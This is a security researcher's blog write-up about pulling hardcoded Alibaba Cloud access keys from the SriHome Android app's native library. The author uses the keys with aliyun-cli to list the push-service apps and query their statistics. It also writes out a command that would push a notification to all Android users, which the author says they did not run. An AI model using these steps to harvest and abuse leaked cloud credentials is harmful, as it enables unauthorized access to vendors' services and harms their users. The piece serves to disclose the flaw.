Pwning SriHome: Chapter 2
Hold on a sec, did you check out the first chapter yet? If not, you might want to give it a read first. Head over there and catch up, then we’ll continue. Pwning SriHome: Chapter 1
Continuation
After successfully gaining access to their storage bucket and browsing through some files, I couldn’t shake the feeling that there might be more to uncover. So, I decided to backtrack to the initial point where I found the credentials - the libJNat.so
file.
More Keys!
Since they were messing around with Alibaba’s cloud stuff, I thought, ‘Hey, there might be more sneaky credentials lying around.’ So, following GitGuardian’s lead with their fancy LT[A6]I
pattern for access key IDs, I fired up a quick grep search. Lo and behold, I hit the jackpot - found another key along with it’s secret just hanging out there!
strings SriHome_21.9.24_Apkpure/lib/armeabi-v7a/libJNat.so | grep -A 1 'LT[A6]I'
LTAI...SSq
L01...BCd
--
LTA...CLu
J14...ESm
Note: Oh, and by the way, if you’re wondering why I used -A 1
in grep, it’s because it grabs one more line after the match, and that’s usually where the secret key hangs out - cause they come in pairs :P
Alright, let’s set up those second batch of credentials with aliyun-cli, but this time, let’s name the profile sricam
to keep things organized.
aliyun configure --profile sricam
Configuring profile 'sricam' in 'AK' authenticate mode...
Access Key Id []: LTA......SSq
Access Key Secret []: L01......BCd
Default Region Id []: us-west-1
Default Output Format [json]: json (Only support json)
Default Language [zh|en] en:
Saving profile[sricam] ...Done.
Configure Done!!!
..............888888888888888888888 ........=8888888888888888888D=..............
...........88888888888888888888888 ..........D8888888888888888888888I...........
.........,8888888888888ZI: ...........................=Z88D8888888888D..........
.........+88888888 ..........................................88888888D..........
.........+88888888 .......Welcome to use Alibaba Cloud.......O8888888D..........
.........+88888888 ............. ************* ..............O8888888D..........
.........+88888888 .... Command Line Interface(Reloaded) ....O8888888D..........
.........+88888888...........................................88888888D..........
..........D888888888888DO+. ..........................?ND888888888888D..........
...........O8888888888888888888888...........D8888888888888888888888=...........
............ .:D8888888888888888888.........78888888888888888888O ..............
However, it seems that these credentials don’t grant access to any OSS buckets.
aliyun oss ls --profile sricam
ERROR: oss: service returned error: StatusCode=403, ErrorCode=AccessDenied, ErrorMessage="You are forbidden to list buckets.", RequestId=65D65B9DE2741F35326A81C4, Ec=0003-00000202
I gave both sets of credentials a spin across common services like ecs
, rds
, and cloudapi
, but no luck. It seems they didn’t have access to any of those.
I hit a bit of a roadblock, so I decided to try something different. I started poking around by grepping for the strings ‘alibaba’ and ‘aliyun’ in the libJNat.so
file. I found a match for “cloudpush.aliyuncs.com”.
strings SriHome_21.9.24_Apkpure/lib/armeabi-v7a/libJNat.so | grep alibaba
strings SriHome_21.9.24_Apkpure/lib/armeabi-v7a/libJNat.so | grep aliyun
cloudpush.aliyuncs.com
Then, while I was at it, I decided to grep for the word ‘push’ and stumbled upon ‘ali push’. A quick Google search later, and it turns out it’s a message push service.
strings SriHome_21.9.24_Apkpure/lib/armeabi-v7a/libJNat.so | grep push
...
ali push
cloudpush.aliyuncs.com
push success to:%s title:%s body:%s
...
I also went the extra mile and confirmed that the application was indeed using the push service by decompiling it with jadx. Here’s what I found:
Alright, now that we know it’s definitely utilizing the message push service, let’s brainstorm some ways to leverage it.
After digging through aliyun push --help
, I stumbled upon ListSummaryApps
, a command that lists all the applications using the push service.
aliyun push ListSummaryApps
{
"RequestId": "22E9DE0F-7EF6-5E2A-BECC-D8156431D2A8",
"SummaryAppInfos": {
"SummaryAppInfo": [
{
"AppKey": 25539843,
"AppName": "ifHome"
},
{
"AppKey": 25548841,
"AppName": "SriHomeNew"
},
{
"AppKey": 24738117,
"AppName": "SriHome"
},
{
"AppKey": 24732061,
"AppName": "ifHome"
}
]
}
}
Sweet! With the AppKeys for all the applications in hand, let’s dive deeper and gather some statistics using QueryPushStatByApp
.
aliyun push QueryPushStatByApp --AppKey 24738117 --StartTime 2024-01-01T00:00:00Z --EndTime 2024-02-01T00:00:00Z --Granularity DAY
{
"AppPushStats": {
"AppPushStat": [
{
"AcceptCount": 6331760,
"DeletedCount": 0,
"OpenedCount": 11851,
"ReceivedCount": 5022263,
"SentCount": 5023691,
"Time": "2023-12-31T16:00:00Z"
},
{
"AcceptCount": 6242835,
"DeletedCount": 0,
"OpenedCount": 10946,
"ReceivedCount": 4937240,
"SentCount": 4938704,
"Time": "2024-01-01T16:00:00Z"
},
...
...
Alright, querying data is cool, but let’s spice things up a bit. How about we take a peek at PushNoticeToAndroid? Now, that sounds interesting!
After a quick glance through the docs, it seems we’ll need:
- AppKey - we got these!
- Target -
ALL
,DEVICE
,ACCOUNT
,ALIAS
,TAG
(available options) - TargetValue -
Set according to Target. Use commas to separate multiple values. If the limit is exceeded, you need to push it multiple times.
Target=DEVICE, the value is as follows deviceid111,deviceid1111(up to 1000 supported).
Target=ACCOUNT, the value is as follows account111,account222(up to 1000 supported).
Target=ALIAS, the value is as follows alias111,alias222(supports up to 1000).
Target=TAG, supports single Tag and multiple Tags. For the format, please refer to Tag Format .
Target=ALL, the value is ALL .
- Title
- Body
aliyun push PushNoticeToAndroid --AppKey 25548841 --Target ALL --TargetValue ALL --Title deathflash --Body Pwned
Alright, so if I run the above it would shoot out a notification to all Android app users with the title “deathflash” and “Pwned” as the content… quite tempting, but let’s hold off on that, shall we?.
Conclusion
Despite being a basic service like mobile push, it’s alarming to realize how easily it could be exploited to harm application users.